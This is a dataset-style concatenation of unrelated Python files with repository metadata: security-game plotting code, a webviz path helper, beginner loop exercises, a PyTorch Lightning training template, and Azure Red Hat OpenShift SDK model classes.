plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S7.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 9
V8_URS = []
V8_OPT = []
V8_MMP = []
for i in range(len(strategies)):
V8_URS.append(strategies[i][0][8])
V8_OPT.append(strategies[i][1][8])
V8_MMP.append(strategies[i][2][8])
plt.plot(gamma, np.asarray(V8_URS), marker='o')
plt.plot(gamma, np.asarray(V8_OPT), marker='x')
plt.plot(gamma, np.asarray(V8_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S8.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show()
#Plot 10
V9_URS = []
V9_OPT = []
V9_MMP = []
for i in range(len(strategies)):
V9_URS.append(strategies[i][0][9])
V9_OPT.append(strategies[i][1][9])
V9_MMP.append(strategies[i][2][9])
plt.plot(gamma, np.asarray(V9_URS), marker='o')
plt.plot(gamma, np.asarray(V9_OPT), marker='x')
plt.plot(gamma, np.asarray(V9_MMP), marker='+')
plt.ylabel("Defender's Utility $\longrightarrow$")
plt.xlabel("$\gamma \longrightarrow$")
plt.title("Defender's value in state S9.")
plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left')
plt.show() | 41.47138 | 218 | 0.697735 |
0b1ccb2de9b985f25357a45fe5fd16e2eab72b61 | 400 | py | Python | webviz_config/_user_data_dir.py | ivarbje/webviz-config | d1096789e1b0354dbef44555ab79c8a88dbc837c | [
"MIT"
] | null | null | null | webviz_config/_user_data_dir.py | ivarbje/webviz-config | d1096789e1b0354dbef44555ab79c8a88dbc837c | [
"MIT"
] | null | null | null | webviz_config/_user_data_dir.py | ivarbje/webviz-config | d1096789e1b0354dbef44555ab79c8a88dbc837c | [
"MIT"
] | null | null | null | import sys
from pathlib import Path
def user_data_dir() -> Path:
"""Returns platform specific path to store user application data
"""
if sys.platform == "win32":
return Path.home() / "Application Data" / "webviz"
if sys.platform == "darwin":
return Path.home() / "Library" / "Application Support" / "webviz"
return Path.home() / ".local" / "share" / "webviz"
| 25 | 73 | 0.625 |
6185316b5d2f45e7cbe31bea0d25e1e49b81ab73 | 1,000 | py | Python | ch01-05/04_01-magicians.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch01-05/04_01-magicians.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | ch01-05/04_01-magicians.py | remotephone/pythoncrashcourse | 837d05c5ef4976621bd2206328254749a71d60ff | [
"Apache-2.0"
] | null | null | null | magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician)
print("\n====================")
magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician.title() + ", that was a great trick!")
print("I can't wait to see your next trick, " + magician.title() + ".\n")
print("Thank you everyone, that was a great show!")
print("\n====================\n")
print ("""This is improperly formatted code:\n
magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician)\n
It should look like this:\n
magicians = ['alice', 'david', 'carolina']
for magician in magicians:
print(magician)\n
""")
print("Now for pizza stuff")
pizza = ['pepperoni', 'cheese', 'olive']
for za in pizza:
print("I like " + za + " pizza.")
print("I really like pizza!\n")
print("Now for animals")
animals = ['dog', 'cat', 'snek']
for animal in animals:
print("I would like to boop a " + animal + ".")
print("That would be nice") | 26.315789 | 77 | 0.624 |
c4def8a81d6b41d37f98fbb832fa1925efbaee35 | 1,108 | py | Python | base_scripts/base_train.py | tugot17/Pytorch-Lightning-Templates- | 36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8 | [
"MIT"
] | 2 | 2020-11-04T19:14:51.000Z | 2021-03-04T13:14:17.000Z | base_scripts/base_train.py | tugot17/Pytorch-Lightning-Templates- | 36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8 | [
"MIT"
] | null | null | null | base_scripts/base_train.py | tugot17/Pytorch-Lightning-Templates- | 36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8 | [
"MIT"
] | null | null | null | import os
import pytorch_lightning as pl
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.loggers import WandbLogger
if __name__ == "__main__":
dm = ...
model = ...
# Fast run first
trainer = Trainer(
gpus=1, fast_dev_run=True, checkpoint_callback=False, logger=False
)
checkpoint_callback = ModelCheckpoint(
filepath=os.getcwd(),
save_top_k=2,
verbose=True,
monitor="val/loss",
mode="min",
)
experiment_name = ...
PROJECT_NAME = ...
logger = WandbLogger(name=experiment_name, project=PROJECT_NAME)
# And then actual training
pl.seed_everything(42)
trainer = Trainer(
max_epochs=40,
logger=logger,
gpus=1,
# precision=16,
deterministic=True,
accumulate_grad_batches=2,
callbacks=[EarlyStopping(monitor="val/loss")],
# resume_from_checkpoint = 'my_checkpoint.ckpt'
)
trainer.fit(model, dm)
| 23.574468 | 74 | 0.665162 |
2b203a81f5958cf91c95e1e090a7eda9bbff514f | 29,527 | py | Python | python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py | Thanonchai/ARO-RP | 823d357376c6c1ce38ce026acadca6103a0fe2c9 | [
"Apache-2.0"
] | null | null | null | python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py | Thanonchai/ARO-RP | 823d357376c6c1ce38ce026acadca6103a0fe2c9 | [
"Apache-2.0"
] | 1 | 2021-01-22T16:19:04.000Z | 2021-01-22T16:19:04.000Z | python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py | troy0820/ARO-RP | 32dff228210270a02dcd2a66d8c642da53c4e120 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class APIServerProfile(Model):
"""APIServerProfile represents an API server profile.
:param visibility: API server visibility. Possible values include:
'Private', 'Public'
:type visibility: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param url: The URL to access the cluster API server.
:type url: str
:param ip: The IP of the cluster API server.
:type ip: str
"""
_attribute_map = {
'visibility': {'key': 'visibility', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'ip': {'key': 'ip', 'type': 'str'},
}
def __init__(self, *, visibility=None, url: str=None, ip: str=None, **kwargs) -> None:
super(APIServerProfile, self).__init__(**kwargs)
self.visibility = visibility
self.url = url
self.ip = ip
class Resource(Model):
"""Common fields that are returned in the response for all Azure Resource
Manager resources.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
class AzureEntityResource(Resource):
"""The resource model definition for an Azure Resource Manager resource with
an etag.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
:ivar etag: Resource Etag.
:vartype etag: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(AzureEntityResource, self).__init__(**kwargs)
self.etag = None
class CloudError(Model):
"""CloudError represents a cloud error.
:param error: An error response from the service.
:type error:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CloudErrorBody
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'CloudErrorBody'},
}
def __init__(self, *, error=None, **kwargs) -> None:
super(CloudError, self).__init__(**kwargs)
self.error = error
class CloudErrorException(HttpOperationError):
"""Server responsed with exception of type: 'CloudError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(CloudErrorException, self).__init__(deserialize, response, 'CloudError', *args)
class CloudErrorBody(Model):
"""CloudErrorBody represents the body of a cloud error.
:param code: An identifier for the error. Codes are invariant and are
intended to be consumed programmatically.
:type code: str
:param message: A message describing the error, intended to be suitable
for display in a user interface.
:type message: str
:param target: The target of the particular error. For example, the name
of the property in error.
:type target: str
:param details: A list of additional details about the error.
:type details:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CloudErrorBody]
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[CloudErrorBody]'},
}
def __init__(self, *, code: str=None, message: str=None, target: str=None, details=None, **kwargs) -> None:
super(CloudErrorBody, self).__init__(**kwargs)
self.code = code
self.message = message
self.target = target
self.details = details
class ClusterProfile(Model):
"""ClusterProfile represents a cluster profile.
:param pull_secret: The pull secret for the cluster.
:type pull_secret: str
:param domain: The domain for the cluster.
:type domain: str
:param version: The version of the cluster.
:type version: str
:param resource_group_id: The ID of the cluster resource group.
:type resource_group_id: str
"""
_attribute_map = {
'pull_secret': {'key': 'pullSecret', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'resource_group_id': {'key': 'resourceGroupId', 'type': 'str'},
}
def __init__(self, *, pull_secret: str=None, domain: str=None, version: str=None, resource_group_id: str=None, **kwargs) -> None:
super(ClusterProfile, self).__init__(**kwargs)
self.pull_secret = pull_secret
self.domain = domain
self.version = version
self.resource_group_id = resource_group_id
class ConsoleProfile(Model):
"""ConsoleProfile represents a console profile.
:param url: The URL to access the cluster console.
:type url: str
"""
_attribute_map = {
'url': {'key': 'url', 'type': 'str'},
}
def __init__(self, *, url: str=None, **kwargs) -> None:
super(ConsoleProfile, self).__init__(**kwargs)
self.url = url
class Display(Model):
"""Display represents the display details of an operation.
:param provider: Friendly name of the resource provider.
:type provider: str
:param resource: Resource type on which the operation is performed.
:type resource: str
:param operation: Operation type: read, write, delete, listKeys/action,
etc.
:type operation: str
:param description: Friendly name of the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(self, *, provider: str=None, resource: str=None, operation: str=None, description: str=None, **kwargs) -> None:
super(Display, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class IngressProfile(Model):
"""IngressProfile represents an ingress profile.
:param name: The ingress profile name.
:type name: str
:param visibility: Ingress visibility. Possible values include: 'Private',
'Public'
:type visibility: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param ip: The IP of the ingress.
:type ip: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'visibility': {'key': 'visibility', 'type': 'str'},
'ip': {'key': 'ip', 'type': 'str'},
}
def __init__(self, *, name: str=None, visibility=None, ip: str=None, **kwargs) -> None:
super(IngressProfile, self).__init__(**kwargs)
self.name = name
self.visibility = visibility
self.ip = ip
class MasterProfile(Model):
"""MasterProfile represents a master profile.
:param vm_size: The size of the master VMs. Possible values include:
'Standard_D16as_v4', 'Standard_D16s_v3', 'Standard_D2s_v3',
'Standard_D32as_v4', 'Standard_D32s_v3', 'Standard_D4as_v4',
'Standard_D4s_v3', 'Standard_D8as_v4', 'Standard_D8s_v3',
'Standard_E16s_v3', 'Standard_E32s_v3', 'Standard_E4s_v3',
'Standard_E64i_v3', 'Standard_E64is_v3', 'Standard_E8s_v3',
'Standard_F16s_v2', 'Standard_F32s_v2', 'Standard_F4s_v2',
'Standard_F72s_v2', 'Standard_F8s_v2', 'Standard_G5', 'Standard_GS5',
'Standard_M128ms'
:type vm_size: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.VMSize
:param subnet_id: The Azure resource ID of the master subnet.
:type subnet_id: str
"""
_attribute_map = {
'vm_size': {'key': 'vmSize', 'type': 'str'},
'subnet_id': {'key': 'subnetId', 'type': 'str'},
}
def __init__(self, *, vm_size=None, subnet_id: str=None, **kwargs) -> None:
super(MasterProfile, self).__init__(**kwargs)
self.vm_size = vm_size
self.subnet_id = subnet_id
class NetworkProfile(Model):
"""NetworkProfile represents a network profile.
:param pod_cidr: The CIDR used for OpenShift/Kubernetes Pods.
:type pod_cidr: str
:param service_cidr: The CIDR used for OpenShift/Kubernetes Services.
:type service_cidr: str
"""
_attribute_map = {
'pod_cidr': {'key': 'podCidr', 'type': 'str'},
'service_cidr': {'key': 'serviceCidr', 'type': 'str'},
}
def __init__(self, *, pod_cidr: str=None, service_cidr: str=None, **kwargs) -> None:
super(NetworkProfile, self).__init__(**kwargs)
self.pod_cidr = pod_cidr
self.service_cidr = service_cidr
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top
level resource.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(self, *, location: str, tags=None, **kwargs) -> None:
super(TrackedResource, self).__init__(**kwargs)
self.tags = tags
self.location = location
class OpenShiftCluster(TrackedResource):
"""OpenShiftCluster represents an Azure Red Hat OpenShift cluster.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives
:type location: str
:param provisioning_state: The cluster provisioning state. Possible values
include: 'AdminUpdating', 'Creating', 'Deleting', 'Failed', 'Succeeded',
'Updating'
:type provisioning_state: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param cluster_profile: The cluster profile.
:type cluster_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ClusterProfile
:param console_profile: The console profile.
:type console_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ConsoleProfile
:param service_principal_profile: The cluster service principal profile.
:type service_principal_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ServicePrincipalProfile
:param network_profile: The cluster network profile.
:type network_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.NetworkProfile
:param master_profile: The cluster master profile.
:type master_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.MasterProfile
:param worker_profiles: The cluster worker profiles.
:type worker_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.WorkerProfile]
:param apiserver_profile: The cluster API server profile.
:type apiserver_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.APIServerProfile
:param ingress_profiles: The cluster ingress profiles.
:type ingress_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.IngressProfile]
:ivar system_data: The system meta data relating to this resource.
:vartype system_data:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'cluster_profile': {'key': 'properties.clusterProfile', 'type': 'ClusterProfile'},
'console_profile': {'key': 'properties.consoleProfile', 'type': 'ConsoleProfile'},
'service_principal_profile': {'key': 'properties.servicePrincipalProfile', 'type': 'ServicePrincipalProfile'},
'network_profile': {'key': 'properties.networkProfile', 'type': 'NetworkProfile'},
'master_profile': {'key': 'properties.masterProfile', 'type': 'MasterProfile'},
'worker_profiles': {'key': 'properties.workerProfiles', 'type': '[WorkerProfile]'},
'apiserver_profile': {'key': 'properties.apiserverProfile', 'type': 'APIServerProfile'},
'ingress_profiles': {'key': 'properties.ingressProfiles', 'type': '[IngressProfile]'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(self, *, location: str, tags=None, provisioning_state=None, cluster_profile=None, console_profile=None, service_principal_profile=None, network_profile=None, master_profile=None, worker_profiles=None, apiserver_profile=None, ingress_profiles=None, **kwargs) -> None:
super(OpenShiftCluster, self).__init__(tags=tags, location=location, **kwargs)
self.provisioning_state = provisioning_state
self.cluster_profile = cluster_profile
self.console_profile = console_profile
self.service_principal_profile = service_principal_profile
self.network_profile = network_profile
self.master_profile = master_profile
self.worker_profiles = worker_profiles
self.apiserver_profile = apiserver_profile
self.ingress_profiles = ingress_profiles
self.system_data = None
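# Illustrative construction sketch (not part of the generated client). All values
# below are made-up placeholders; they only show how the keyword-only constructors
# defined in this module fit together before the model is handed to the generated
# operations client.
if __name__ == "__main__":
    example_cluster = OpenShiftCluster(
        location="eastus",
        tags={"environment": "dev"},
        cluster_profile=ClusterProfile(domain="example", version="4.6.0"),
        master_profile=MasterProfile(vm_size="Standard_D8s_v3",
                                     subnet_id="/subscriptions/.../master-subnet"),
        network_profile=NetworkProfile(pod_cidr="10.128.0.0/14",
                                       service_cidr="172.30.0.0/16"),
    )
    print(example_cluster.location)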
class OpenShiftClusterAdminKubeconfig(Model):
"""OpenShiftClusterAdminKubeconfig represents an OpenShift cluster's admin
kubeconfig.
:param kubeconfig: The base64-encoded kubeconfig file.
:type kubeconfig: str
"""
_attribute_map = {
'kubeconfig': {'key': 'kubeconfig', 'type': 'str'},
}
def __init__(self, *, kubeconfig: str=None, **kwargs) -> None:
super(OpenShiftClusterAdminKubeconfig, self).__init__(**kwargs)
self.kubeconfig = kubeconfig
class OpenShiftClusterCredentials(Model):
"""OpenShiftClusterCredentials represents an OpenShift cluster's credentials.
:param kubeadmin_username: The username for the kubeadmin user.
:type kubeadmin_username: str
:param kubeadmin_password: The password for the kubeadmin user.
:type kubeadmin_password: str
"""
_attribute_map = {
'kubeadmin_username': {'key': 'kubeadminUsername', 'type': 'str'},
'kubeadmin_password': {'key': 'kubeadminPassword', 'type': 'str'},
}
def __init__(self, *, kubeadmin_username: str=None, kubeadmin_password: str=None, **kwargs) -> None:
super(OpenShiftClusterCredentials, self).__init__(**kwargs)
self.kubeadmin_username = kubeadmin_username
self.kubeadmin_password = kubeadmin_password
class OpenShiftClusterUpdate(Model):
"""OpenShiftCluster represents an Azure Red Hat OpenShift cluster.
Variables are only populated by the server, and will be ignored when
sending a request.
:param tags: The resource tags.
:type tags: dict[str, str]
:param provisioning_state: The cluster provisioning state. Possible values
include: 'AdminUpdating', 'Creating', 'Deleting', 'Failed', 'Succeeded',
'Updating'
:type provisioning_state: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param cluster_profile: The cluster profile.
:type cluster_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ClusterProfile
:param console_profile: The console profile.
:type console_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ConsoleProfile
:param service_principal_profile: The cluster service principal profile.
:type service_principal_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ServicePrincipalProfile
:param network_profile: The cluster network profile.
:type network_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.NetworkProfile
:param master_profile: The cluster master profile.
:type master_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.MasterProfile
:param worker_profiles: The cluster worker profiles.
:type worker_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.WorkerProfile]
:param apiserver_profile: The cluster API server profile.
:type apiserver_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.APIServerProfile
:param ingress_profiles: The cluster ingress profiles.
:type ingress_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.IngressProfile]
:ivar system_data: The system meta data relating to this resource.
:vartype system_data:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.SystemData
"""
_validation = {
'system_data': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'cluster_profile': {'key': 'properties.clusterProfile', 'type': 'ClusterProfile'},
'console_profile': {'key': 'properties.consoleProfile', 'type': 'ConsoleProfile'},
'service_principal_profile': {'key': 'properties.servicePrincipalProfile', 'type': 'ServicePrincipalProfile'},
'network_profile': {'key': 'properties.networkProfile', 'type': 'NetworkProfile'},
'master_profile': {'key': 'properties.masterProfile', 'type': 'MasterProfile'},
'worker_profiles': {'key': 'properties.workerProfiles', 'type': '[WorkerProfile]'},
'apiserver_profile': {'key': 'properties.apiserverProfile', 'type': 'APIServerProfile'},
'ingress_profiles': {'key': 'properties.ingressProfiles', 'type': '[IngressProfile]'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(self, *, tags=None, provisioning_state=None, cluster_profile=None, console_profile=None, service_principal_profile=None, network_profile=None, master_profile=None, worker_profiles=None, apiserver_profile=None, ingress_profiles=None, **kwargs) -> None:
super(OpenShiftClusterUpdate, self).__init__(**kwargs)
self.tags = tags
self.provisioning_state = provisioning_state
self.cluster_profile = cluster_profile
self.console_profile = console_profile
self.service_principal_profile = service_principal_profile
self.network_profile = network_profile
self.master_profile = master_profile
self.worker_profiles = worker_profiles
self.apiserver_profile = apiserver_profile
self.ingress_profiles = ingress_profiles
self.system_data = None
class Operation(Model):
"""Operation represents an RP operation.
:param name: Operation name: {provider}/{resource}/{operation}.
:type name: str
:param display: The object that describes the operation.
:type display:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.Display
:param origin: Sources of requests to this operation. Comma separated
list with valid values user or system, e.g. "user,system".
:type origin: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'Display'},
'origin': {'key': 'origin', 'type': 'str'},
}
def __init__(self, *, name: str=None, display=None, origin: str=None, **kwargs) -> None:
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
self.origin = origin
class ProxyResource(Resource):
"""The resource model definition for an Azure Resource Manager proxy resource.
It will have everything other than required location and tags.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(ProxyResource, self).__init__(**kwargs)
class ServicePrincipalProfile(Model):
"""ServicePrincipalProfile represents a service principal profile.
:param client_id: The client ID used for the cluster.
:type client_id: str
:param client_secret: The client secret used for the cluster.
:type client_secret: str
"""
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'client_secret': {'key': 'clientSecret', 'type': 'str'},
}
def __init__(self, *, client_id: str=None, client_secret: str=None, **kwargs) -> None:
super(ServicePrincipalProfile, self).__init__(**kwargs)
self.client_id = client_id
self.client_secret = client_secret
class SystemData(Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource.
Possible values include: 'User', 'Application', 'ManagedIdentity', 'Key'
:type created_by_type: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the
resource. Possible values include: 'User', 'Application',
'ManagedIdentity', 'Key'
:type last_modified_by_type: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CreatedByType
    :param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(self, *, created_by: str=None, created_by_type=None, created_at=None, last_modified_by: str=None, last_modified_by_type=None, last_modified_at=None, **kwargs) -> None:
super(SystemData, self).__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
class WorkerProfile(Model):
"""WorkerProfile represents a worker profile.
:param name: The worker profile name.
:type name: str
:param vm_size: The size of the worker VMs. Possible values include:
'Standard_D16as_v4', 'Standard_D16s_v3', 'Standard_D2s_v3',
'Standard_D32as_v4', 'Standard_D32s_v3', 'Standard_D4as_v4',
'Standard_D4s_v3', 'Standard_D8as_v4', 'Standard_D8s_v3',
'Standard_E16s_v3', 'Standard_E32s_v3', 'Standard_E4s_v3',
'Standard_E64i_v3', 'Standard_E64is_v3', 'Standard_E8s_v3',
'Standard_F16s_v2', 'Standard_F32s_v2', 'Standard_F4s_v2',
'Standard_F72s_v2', 'Standard_F8s_v2', 'Standard_G5', 'Standard_GS5',
'Standard_M128ms'
:type vm_size: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.VMSize
:param disk_size_gb: The disk size of the worker VMs.
:type disk_size_gb: int
:param subnet_id: The Azure resource ID of the worker subnet.
:type subnet_id: str
:param count: The number of worker VMs.
:type count: int
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'vm_size': {'key': 'vmSize', 'type': 'str'},
'disk_size_gb': {'key': 'diskSizeGB', 'type': 'int'},
'subnet_id': {'key': 'subnetId', 'type': 'str'},
'count': {'key': 'count', 'type': 'int'},
}
def __init__(self, *, name: str=None, vm_size=None, disk_size_gb: int=None, subnet_id: str=None, count: int=None, **kwargs) -> None:
super(WorkerProfile, self).__init__(**kwargs)
self.name = name
self.vm_size = vm_size
self.disk_size_gb = disk_size_gb
self.subnet_id = subnet_id
self.count = count
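# Illustrative usage sketch (not part of the generated SDK): composing the models
# defined above. All values below are placeholders chosen for the example only.
if __name__ == "__main__":
    example_worker = WorkerProfile(
        name="worker",
        vm_size="Standard_D4s_v3",
        disk_size_gb=128,
        subnet_id="<worker-subnet-resource-id>",
        count=3,
    )
    example_update = OpenShiftClusterUpdate(
        tags={"env": "dev"},
        worker_profiles=[example_worker],
    )
    print(example_update.worker_profiles[0].vm_size)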
| 39.633557 | 283 | 0.66827 |
c1b7bd4faff6f6fef82a82bf91cebd837356d2dc | 989 | py | Python | backend/api/__init__.py | EylonKoenig/LS_Technology_interview_assessment | 6911391fb86a6e2fca97af86580b2a0d58550baf | [
"MIT"
